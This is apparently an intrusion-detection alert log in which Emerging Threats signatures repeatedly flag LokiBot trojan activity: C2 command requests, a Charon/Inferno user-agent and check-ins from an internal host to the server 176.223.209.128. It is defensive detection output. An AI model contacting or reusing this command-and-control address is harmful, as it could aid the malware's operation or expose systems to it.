                                              11/25/21-10:48:09.107461TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984880192.168.11.20176.223.209.128
                                              11/25/21-10:48:09.857430TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984980192.168.11.20176.223.209.128
                                              11/25/21-10:48:09.857430TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984980192.168.11.20176.223.209.128
                                              11/25/21-10:48:09.857430TCP2025381ET TROJAN LokiBot Checkin4984980192.168.11.20176.223.209.128
                                              11/25/21-10:48:09.857430TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984980192.168.11.20176.223.209.128
                                              11/25/21-10:48:10.692074TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.11.20176.223.209.128
                                              11/25/21-10:48:10.692074TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.11.20176.223.209.128
                                              11/25/21-10:48:10.692074TCP2025381ET TROJAN LokiBot Checkin4985080192.168.11.20176.223.209.128
                                              11/25/21-10:48:10.692074TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985080192.168.11.20176.223.209.128
                                              11/25/21-10:48:11.469665TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.11.20176.223.209.128
                                              11/25/21-10:48:11.469665TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.11.20176.223.209.128
                                              11/25/21-10:48:11.469665TCP2025381ET TROJAN LokiBot Checkin4985180192.168.11.20176.223.209.128
                                              11/25/21-10:48:11.469665TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985180192.168.11.20176.223.209.128
                                              11/25/21-10:48:12.137740TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.11.20176.223.209.128
                                              11/25/21-10:48:12.137740TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.11.20176.223.209.128
                                              11/25/21-10:48:12.137740TCP2025381ET TROJAN LokiBot Checkin4985280192.168.11.20176.223.209.128
                                              11/25/21-10:48:12.137740TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985280192.168.11.20176.223.209.128
                                              11/25/21-10:48:12.876249TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.11.20176.223.209.128
                                              11/25/21-10:48:12.876249TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.11.20176.223.209.128
                                              11/25/21-10:48:12.876249TCP2025381ET TROJAN LokiBot Checkin4985380192.168.11.20176.223.209.128
                                              11/25/21-10:48:12.876249TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985380192.168.11.20176.223.209.128
                                              11/25/21-10:48:13.646369TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.11.20176.223.209.128
                                              11/25/21-10:48:13.646369TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.11.20176.223.209.128
                                              11/25/21-10:48:13.646369TCP2025381ET TROJAN LokiBot Checkin4985480192.168.11.20176.223.209.128
                                              11/25/21-10:48:13.646369TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985480192.168.11.20176.223.209.128
                                              11/25/21-10:48:14.406984TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.11.20176.223.209.128
                                              11/25/21-10:48:14.406984TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.11.20176.223.209.128
                                              11/25/21-10:48:14.406984TCP2025381ET TROJAN LokiBot Checkin4985580192.168.11.20176.223.209.128
                                              11/25/21-10:48:14.406984TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985580192.168.11.20176.223.209.128
                                              11/25/21-10:48:15.068809TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.11.20176.223.209.128
                                              11/25/21-10:48:15.068809TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.11.20176.223.209.128
                                              11/25/21-10:48:15.068809TCP2025381ET TROJAN LokiBot Checkin4985680192.168.11.20176.223.209.128
                                              11/25/21-10:48:15.068809TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985680192.168.11.20176.223.209.128
                                              11/25/21-10:48:15.740662TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.11.20176.223.209.128
                                              11/25/21-10:48:15.740662TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.11.20176.223.209.128
                                              11/25/21-10:48:15.740662TCP2025381ET TROJAN LokiBot Checkin4985780192.168.11.20176.223.209.128
                                              11/25/21-10:48:15.740662TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985780192.168.11.20176.223.209.128
                                              11/25/21-10:48:16.437510TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.11.20176.223.209.128
                                              11/25/21-10:48:16.437510TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.11.20176.223.209.128
                                              11/25/21-10:48:16.437510TCP2025381ET TROJAN LokiBot Checkin4985880192.168.11.20176.223.209.128
                                              11/25/21-10:48:16.437510TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985880192.168.11.20176.223.209.128
                                              11/25/21-10:48:17.100652TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.11.20176.223.209.128
                                              11/25/21-10:48:17.100652TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.11.20176.223.209.128
                                              11/25/21-10:48:17.100652TCP2025381ET TROJAN LokiBot Checkin4985980192.168.11.20176.223.209.128
                                              11/25/21-10:48:17.100652TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985980192.168.11.20176.223.209.128
                                              11/25/21-10:48:17.734632TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.11.20176.223.209.128
                                              11/25/21-10:48:17.734632TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.11.20176.223.209.128
                                              11/25/21-10:48:17.734632TCP2025381ET TROJAN LokiBot Checkin4986080192.168.11.20176.223.209.128
                                              11/25/21-10:48:17.734632TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986080192.168.11.20176.223.209.128
                                              11/25/21-10:48:18.417274TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986180192.168.11.20176.223.209.128
                                              11/25/21-10:48:18.417274TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986180192.168.11.20176.223.209.128
                                              11/25/21-10:48:18.417274TCP2025381ET TROJAN LokiBot Checkin4986180192.168.11.20176.223.209.128
                                              11/25/21-10:48:18.417274TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986180192.168.11.20176.223.209.128
                                              11/25/21-10:48:19.071832TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.11.20176.223.209.128
                                              11/25/21-10:48:19.071832TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.11.20176.223.209.128
                                              11/25/21-10:48:19.071832TCP2025381ET TROJAN LokiBot Checkin4986280192.168.11.20176.223.209.128
                                              11/25/21-10:48:19.071832TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986280192.168.11.20176.223.209.128
                                              11/25/21-10:48:19.719301TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986380192.168.11.20176.223.209.128
                                              11/25/21-10:48:19.719301TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986380192.168.11.20176.223.209.128
                                              11/25/21-10:48:19.719301TCP2025381ET TROJAN LokiBot Checkin4986380192.168.11.20176.223.209.128
                                              11/25/21-10:48:19.719301TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986380192.168.11.20176.223.209.128
                                              11/25/21-10:48:20.354985TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.11.20176.223.209.128
                                              11/25/21-10:48:20.354985TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.11.20176.223.209.128
                                              11/25/21-10:48:20.354985TCP2025381ET TROJAN LokiBot Checkin4986480192.168.11.20176.223.209.128
                                              11/25/21-10:48:20.354985TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986480192.168.11.20176.223.209.128
                                              11/25/21-10:48:21.038148TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986580192.168.11.20176.223.209.128
                                              11/25/21-10:48:21.038148TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986580192.168.11.20176.223.209.128
                                              11/25/21-10:48:21.038148TCP2025381ET TROJAN LokiBot Checkin4986580192.168.11.20176.223.209.128
                                              11/25/21-10:48:21.038148TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986580192.168.11.20176.223.209.128
                                              11/25/21-10:48:21.765352TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986680192.168.11.20176.223.209.128
                                              11/25/21-10:48:21.765352TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986680192.168.11.20176.223.209.128
                                              11/25/21-10:48:21.765352TCP2025381ET TROJAN LokiBot Checkin4986680192.168.11.20176.223.209.128
                                              11/25/21-10:48:21.765352TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986680192.168.11.20176.223.209.128
                                              11/25/21-10:48:22.464834TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.11.20176.223.209.128
                                              11/25/21-10:48:22.464834TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.11.20176.223.209.128
                                              11/25/21-10:48:22.464834TCP2025381ET TROJAN LokiBot Checkin4986780192.168.11.20176.223.209.128
                                              11/25/21-10:48:22.464834TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986780192.168.11.20176.223.209.128
                                              11/25/21-10:48:23.130212TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986980192.168.11.20176.223.209.128
                                              11/25/21-10:48:23.130212TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986980192.168.11.20176.223.209.128
                                              11/25/21-10:48:23.130212TCP2025381ET TROJAN LokiBot Checkin4986980192.168.11.20176.223.209.128
                                              11/25/21-10:48:23.130212TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986980192.168.11.20176.223.209.128
                                              11/25/21-10:48:23.726846TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987080192.168.11.20176.223.209.128
                                              11/25/21-10:48:23.726846TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987080192.168.11.20176.223.209.128
                                              11/25/21-10:48:23.726846TCP2025381ET TROJAN LokiBot Checkin4987080192.168.11.20176.223.209.128
                                              11/25/21-10:48:23.726846TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987080192.168.11.20176.223.209.128
                                              11/25/21-10:48:24.413483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987180192.168.11.20176.223.209.128
                                              11/25/21-10:48:24.413483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987180192.168.11.20176.223.209.128
                                              11/25/21-10:48:24.413483TCP2025381ET TROJAN LokiBot Checkin4987180192.168.11.20176.223.209.128
                                              11/25/21-10:48:24.413483TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987180192.168.11.20176.223.209.128
                                              11/25/21-10:48:25.080255TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987280192.168.11.20176.223.209.128
                                              11/25/21-10:48:25.080255TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987280192.168.11.20176.223.209.128
                                              11/25/21-10:48:25.080255TCP2025381ET TROJAN LokiBot Checkin4987280192.168.11.20176.223.209.128
                                              11/25/21-10:48:25.080255TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987280192.168.11.20176.223.209.128
                                              11/25/21-10:48:25.780948TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987380192.168.11.20176.223.209.128
                                              11/25/21-10:48:25.780948TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987380192.168.11.20176.223.209.128
                                              11/25/21-10:48:25.780948TCP2025381ET TROJAN LokiBot Checkin4987380192.168.11.20176.223.209.128
                                              11/25/21-10:48:25.780948TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987380192.168.11.20176.223.209.128
                                              11/25/21-10:48:26.412910TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987480192.168.11.20176.223.209.128
                                              11/25/21-10:48:26.412910TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987480192.168.11.20176.223.209.128
                                              11/25/21-10:48:26.412910TCP2025381ET TROJAN LokiBot Checkin4987480192.168.11.20176.223.209.128
                                              11/25/21-10:48:26.412910TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987480192.168.11.20176.223.209.128
                                              11/25/21-10:48:27.083164TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987580192.168.11.20176.223.209.128
                                              11/25/21-10:48:27.083164TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987580192.168.11.20176.223.209.128
                                              11/25/21-10:48:27.083164TCP2025381ET TROJAN LokiBot Checkin4987580192.168.11.20176.223.209.128
                                              11/25/21-10:48:27.083164TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987580192.168.11.20176.223.209.128
                                              11/25/21-10:48:27.693462TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987680192.168.11.20176.223.209.128
                                              11/25/21-10:48:27.693462TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987680192.168.11.20176.223.209.128
                                              11/25/21-10:48:27.693462TCP2025381ET TROJAN LokiBot Checkin4987680192.168.11.20176.223.209.128
                                              11/25/21-10:48:27.693462TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987680192.168.11.20176.223.209.128
                                              11/25/21-10:48:28.273851TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987780192.168.11.20176.223.209.128
                                              11/25/21-10:48:28.273851TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987780192.168.11.20176.223.209.128
                                              11/25/21-10:48:28.273851TCP2025381ET TROJAN LokiBot Checkin4987780192.168.11.20176.223.209.128
                                              11/25/21-10:48:28.273851TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987780192.168.11.20176.223.209.128
                                              11/25/21-10:48:28.858505TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987880192.168.11.20176.223.209.128
                                              11/25/21-10:48:28.858505TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987880192.168.11.20176.223.209.128
                                              11/25/21-10:48:28.858505TCP2025381ET TROJAN LokiBot Checkin4987880192.168.11.20176.223.209.128
                                              11/25/21-10:48:28.858505TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987880192.168.11.20176.223.209.128
                                              11/25/21-10:48:29.436238TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987980192.168.11.20176.223.209.128
                                              11/25/21-10:48:29.436238TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987980192.168.11.20176.223.209.128
                                              11/25/21-10:48:29.436238TCP2025381ET TROJAN LokiBot Checkin4987980192.168.11.20176.223.209.128
                                              11/25/21-10:48:29.436238TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987980192.168.11.20176.223.209.128
                                              11/25/21-10:48:29.956863TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988080192.168.11.20176.223.209.128
                                              11/25/21-10:48:29.956863TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988080192.168.11.20176.223.209.128
                                              11/25/21-10:48:29.956863TCP2025381ET TROJAN LokiBot Checkin4988080192.168.11.20176.223.209.128
                                              11/25/21-10:48:29.956863TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988080192.168.11.20176.223.209.128
                                              11/25/21-10:48:30.618581TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988180192.168.11.20176.223.209.128
                                              11/25/21-10:48:30.618581TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.11.20176.223.209.128
                                              11/25/21-10:48:30.618581TCP2025381ET TROJAN LokiBot Checkin4988180192.168.11.20176.223.209.128
                                              11/25/21-10:48:30.618581TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.11.20176.223.209.128
                                              11/25/21-10:48:31.231230TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.11.20176.223.209.128
                                              11/25/21-10:48:31.231230TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.11.20176.223.209.128
                                              11/25/21-10:48:31.231230TCP2025381ET TROJAN LokiBot Checkin4988280192.168.11.20176.223.209.128
                                              11/25/21-10:48:31.231230TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.11.20176.223.209.128
                                              11/25/21-10:48:31.831960TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.11.20176.223.209.128
                                              11/25/21-10:48:31.831960TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.11.20176.223.209.128
                                              11/25/21-10:48:31.831960TCP2025381ET TROJAN LokiBot Checkin4988380192.168.11.20176.223.209.128
                                              11/25/21-10:48:31.831960TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.11.20176.223.209.128
                                              11/25/21-10:48:32.435657TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988480192.168.11.20176.223.209.128
                                              11/25/21-10:48:32.435657TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988480192.168.11.20176.223.209.128
                                              11/25/21-10:48:32.435657TCP2025381ET TROJAN LokiBot Checkin4988480192.168.11.20176.223.209.128
                                              11/25/21-10:48:32.435657TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988480192.168.11.20176.223.209.128
                                              11/25/21-10:48:33.088495TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.11.20176.223.209.128
                                              11/25/21-10:48:33.088495TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.11.20176.223.209.128
                                              11/25/21-10:48:33.088495TCP2025381ET TROJAN LokiBot Checkin4988580192.168.11.20176.223.209.128
                                              11/25/21-10:48:33.088495TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.11.20176.223.209.128
                                              11/25/21-10:48:33.745000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988680192.168.11.20176.223.209.128
                                              11/25/21-10:48:33.745000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988680192.168.11.20176.223.209.128
                                              11/25/21-10:48:33.745000TCP2025381ET TROJAN LokiBot Checkin4988680192.168.11.20176.223.209.128
                                              11/25/21-10:48:33.745000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988680192.168.11.20176.223.209.128
                                              11/25/21-10:48:34.343229TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.11.20176.223.209.128
                                              11/25/21-10:48:34.343229TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.11.20176.223.209.128
                                              11/25/21-10:48:34.343229TCP2025381ET TROJAN LokiBot Checkin4988780192.168.11.20176.223.209.128
                                              11/25/21-10:48:34.343229TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.11.20176.223.209.128
                                              11/25/21-10:48:34.941843TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.11.20176.223.209.128
                                              11/25/21-10:48:34.941843TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.11.20176.223.209.128
                                              11/25/21-10:48:34.941843TCP2025381ET TROJAN LokiBot Checkin4988880192.168.11.20176.223.209.128
                                              11/25/21-10:48:34.941843TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.11.20176.223.209.128
                                              11/25/21-10:48:35.542265TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.11.20176.223.209.128
                                              11/25/21-10:48:35.542265TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.11.20176.223.209.128
                                              11/25/21-10:48:35.542265TCP2025381ET TROJAN LokiBot Checkin4988980192.168.11.20176.223.209.128
                                              11/25/21-10:48:35.542265TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.11.20176.223.209.128
                                              11/25/21-10:48:36.204634TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.11.20176.223.209.128
                                              11/25/21-10:48:36.204634TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.11.20176.223.209.128
                                              11/25/21-10:48:36.204634TCP2025381ET TROJAN LokiBot Checkin4989080192.168.11.20176.223.209.128
                                              11/25/21-10:48:36.204634TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.11.20176.223.209.128
                                              11/25/21-10:48:36.820808TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989180192.168.11.20176.223.209.128
                                              11/25/21-10:48:36.820808TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989180192.168.11.20176.223.209.128
                                              11/25/21-10:48:36.820808TCP2025381ET TROJAN LokiBot Checkin4989180192.168.11.20176.223.209.128
                                              11/25/21-10:48:36.820808TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989180192.168.11.20176.223.209.128
                                              11/25/21-10:48:37.469781TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.11.20176.223.209.128
                                              11/25/21-10:48:37.469781TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.11.20176.223.209.128
                                              11/25/21-10:48:37.469781TCP2025381ET TROJAN LokiBot Checkin4989280192.168.11.20176.223.209.128
                                              11/25/21-10:48:37.469781TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.11.20176.223.209.128
                                              11/25/21-10:48:38.005113TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989380192.168.11.20176.223.209.128
                                              11/25/21-10:48:38.005113TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989380192.168.11.20176.223.209.128
                                              11/25/21-10:48:38.005113TCP2025381ET TROJAN LokiBot Checkin4989380192.168.11.20176.223.209.128
                                              11/25/21-10:48:38.005113TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989380192.168.11.20176.223.209.128
                                              11/25/21-10:48:38.572495TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989480192.168.11.20176.223.209.128
                                              11/25/21-10:48:38.572495TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989480192.168.11.20176.223.209.128
                                              11/25/21-10:48:38.572495TCP2025381ET TROJAN LokiBot Checkin4989480192.168.11.20176.223.209.128
                                              11/25/21-10:48:38.572495TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989480192.168.11.20176.223.209.128
                                              11/25/21-10:48:39.175559TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989580192.168.11.20176.223.209.128
                                              11/25/21-10:48:39.175559TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989580192.168.11.20176.223.209.128
                                              11/25/21-10:48:39.175559TCP2025381ET TROJAN LokiBot Checkin4989580192.168.11.20176.223.209.128
                                              11/25/21-10:48:39.175559TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989580192.168.11.20176.223.209.128
                                              11/25/21-10:48:39.761326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989680192.168.11.20176.223.209.128
                                              11/25/21-10:48:39.761326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989680192.168.11.20176.223.209.128
                                              11/25/21-10:48:39.761326TCP2025381ET TROJAN LokiBot Checkin4989680192.168.11.20176.223.209.128
                                              11/25/21-10:48:39.761326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989680192.168.11.20176.223.209.128
                                              11/25/21-10:48:40.218861TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989780192.168.11.20176.223.209.128
                                              11/25/21-10:48:40.218861TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989780192.168.11.20176.223.209.128
                                              11/25/21-10:48:40.218861TCP2025381ET TROJAN LokiBot Checkin4989780192.168.11.20176.223.209.128
                                              11/25/21-10:48:40.218861TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989780192.168.11.20176.223.209.128
                                              11/25/21-10:48:40.780536TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989880192.168.11.20176.223.209.128
                                              11/25/21-10:48:40.780536TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989880192.168.11.20176.223.209.128
                                              11/25/21-10:48:40.780536TCP2025381ET TROJAN LokiBot Checkin4989880192.168.11.20176.223.209.128
                                              11/25/21-10:48:40.780536TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989880192.168.11.20176.223.209.128
                                              11/25/21-10:48:41.373512TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989980192.168.11.20176.223.209.128
                                              11/25/21-10:48:41.373512TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989980192.168.11.20176.223.209.128
                                              11/25/21-10:48:41.373512TCP2025381ET TROJAN LokiBot Checkin4989980192.168.11.20176.223.209.128
                                              11/25/21-10:48:41.373512TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989980192.168.11.20176.223.209.128
                                              11/25/21-10:48:41.968153TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990080192.168.11.20176.223.209.128
                                              11/25/21-10:48:41.968153TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990080192.168.11.20176.223.209.128
                                              11/25/21-10:48:41.968153TCP2025381ET TROJAN LokiBot Checkin4990080192.168.11.20176.223.209.128
                                              11/25/21-10:48:41.968153TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990080192.168.11.20176.223.209.128
                                              11/25/21-10:48:42.536148TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990180192.168.11.20176.223.209.128
                                              11/25/21-10:48:42.536148TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990180192.168.11.20176.223.209.128
                                              11/25/21-10:48:42.536148TCP2025381ET TROJAN LokiBot Checkin4990180192.168.11.20176.223.209.128
                                              11/25/21-10:48:42.536148TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990180192.168.11.20176.223.209.128
                                              11/25/21-10:48:43.112376TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990280192.168.11.20176.223.209.128
                                              11/25/21-10:48:43.112376TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990280192.168.11.20176.223.209.128
                                              11/25/21-10:48:43.112376TCP2025381ET TROJAN LokiBot Checkin4990280192.168.11.20176.223.209.128
                                              11/25/21-10:48:43.112376TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990280192.168.11.20176.223.209.128
                                              11/25/21-10:48:43.645826TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990380192.168.11.20176.223.209.128
                                              11/25/21-10:48:43.645826TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990380192.168.11.20176.223.209.128
                                              11/25/21-10:48:43.645826TCP2025381ET TROJAN LokiBot Checkin4990380192.168.11.20176.223.209.128
                                              11/25/21-10:48:43.645826TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990380192.168.11.20176.223.209.128
                                              11/25/21-10:48:44.201691TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990480192.168.11.20176.223.209.128
                                              11/25/21-10:48:44.201691TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990480192.168.11.20176.223.209.128
                                              11/25/21-10:48:44.201691TCP2025381ET TROJAN LokiBot Checkin4990480192.168.11.20176.223.209.128
                                              11/25/21-10:48:44.201691TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990480192.168.11.20176.223.209.128
                                              11/25/21-10:48:44.811529TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990580192.168.11.20176.223.209.128
                                              11/25/21-10:48:44.811529TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990580192.168.11.20176.223.209.128
                                              11/25/21-10:48:44.811529TCP2025381ET TROJAN LokiBot Checkin4990580192.168.11.20176.223.209.128
                                              11/25/21-10:48:44.811529TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990580192.168.11.20176.223.209.128
                                              11/25/21-10:48:45.392079TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990680192.168.11.20176.223.209.128
                                              11/25/21-10:48:45.392079TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990680192.168.11.20176.223.209.128
                                              11/25/21-10:48:45.392079TCP2025381ET TROJAN LokiBot Checkin4990680192.168.11.20176.223.209.128
                                              11/25/21-10:48:45.392079TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990680192.168.11.20176.223.209.128
                                              11/25/21-10:48:45.989299TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990780192.168.11.20176.223.209.128
                                              11/25/21-10:48:45.989299TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990780192.168.11.20176.223.209.128
                                              11/25/21-10:48:45.989299TCP2025381ET TROJAN LokiBot Checkin4990780192.168.11.20176.223.209.128
                                              11/25/21-10:48:45.989299TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990780192.168.11.20176.223.209.128
